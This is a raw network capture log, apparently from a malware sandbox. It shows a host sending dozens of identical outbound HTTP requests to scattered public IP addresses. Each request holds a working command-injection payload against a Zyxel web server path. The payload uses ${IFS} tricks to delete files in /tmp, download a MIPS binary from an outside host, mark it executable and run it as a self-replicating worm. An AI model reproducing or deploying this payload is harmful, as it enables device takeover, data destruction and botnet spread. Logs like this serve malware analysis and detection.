                                        Mar 31, 2024 09:21:44.136481047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5600192.168.2.2337628110.26.215.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136528969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5601192.168.2.2335416123.116.148.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136586905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5602192.168.2.236089687.146.37.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136639118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5603192.168.2.234805487.136.32.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136688948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5604192.168.2.2354302191.108.229.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136722088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5605192.168.2.2334194221.57.233.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136769056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5606192.168.2.234286237.244.241.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136809111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5607192.168.2.235741057.179.119.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136866093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5608192.168.2.2336610157.148.231.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136917114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5609192.168.2.234225867.49.31.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.136980057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5610192.168.2.234287251.214.252.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137027979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5611192.168.2.2341944179.228.148.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137096882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5612192.168.2.2335694189.97.122.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137192011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5613192.168.2.235277887.198.76.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137243986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5614192.168.2.233901659.184.66.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137300014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5615192.168.2.2355374181.165.105.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137376070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5616192.168.2.2338964182.220.194.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137429953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5617192.168.2.2346802149.195.12.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137491941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5618192.168.2.233992890.159.170.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137537956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5619192.168.2.2346544198.239.159.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137576103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5620192.168.2.2345366188.181.8.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137635946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5621192.168.2.2348794118.162.23.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137700081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5622192.168.2.2334366194.59.27.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137729883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5623192.168.2.235068054.226.59.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137780905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5624192.168.2.2349758134.162.198.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137837887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5625192.168.2.2355046101.83.76.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137885094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5626192.168.2.235415291.235.19.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137923956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5627192.168.2.2349832202.46.235.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.137958050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5628192.168.2.2338864181.107.238.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138020992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5629192.168.2.2335786204.72.161.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138070107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5630192.168.2.2351800217.126.165.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138113022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5631192.168.2.2346390201.62.181.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138160944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5632192.168.2.2339138190.219.236.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138212919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5633192.168.2.2343588130.127.27.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138259888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5634192.168.2.2333358108.134.49.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138318062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5635192.168.2.2355238156.89.68.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138376951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5636192.168.2.2348580221.49.117.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138417959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5637192.168.2.2352064171.208.138.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138475895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5638192.168.2.2352812185.219.62.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138549089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5639192.168.2.2355876204.72.73.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138614893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5640192.168.2.2336108132.164.30.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138643980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5641192.168.2.2351342190.24.63.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138730049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5642192.168.2.235595488.128.71.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138756037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5643192.168.2.2337064110.242.199.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138797045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5644192.168.2.234914262.170.59.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138855934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5645192.168.2.235063820.99.4.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138919115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5646192.168.2.2349232101.114.50.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.138962984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5647192.168.2.2334770205.91.10.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139018059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5648192.168.2.2346198131.162.178.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139039993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5649192.168.2.2347938119.122.19.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139130116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5650192.168.2.235704246.69.162.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139170885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5651192.168.2.2356240213.67.200.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139239073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5652192.168.2.2348898141.203.40.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139285088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5653192.168.2.2334734166.241.146.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139365911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5654192.168.2.2359608150.37.221.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139414072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5655192.168.2.233327258.207.121.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139465094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5656192.168.2.2337738164.71.15.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139544010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5657192.168.2.235202866.77.241.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139600039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5658192.168.2.2352658108.186.7.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139653921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5659192.168.2.234167652.227.156.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139693022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5660192.168.2.234292835.106.148.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139753103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5661192.168.2.2335322108.186.243.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139820099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5662192.168.2.2348398156.25.150.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139868021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5663192.168.2.2337466129.160.237.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139940023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5664192.168.2.2340818172.170.124.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.139982939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5665192.168.2.2356122115.53.63.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140055895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5666192.168.2.2338684143.121.45.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140105009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5667192.168.2.234482025.220.249.47443
                                        TimestampBytes transferredDirectionData
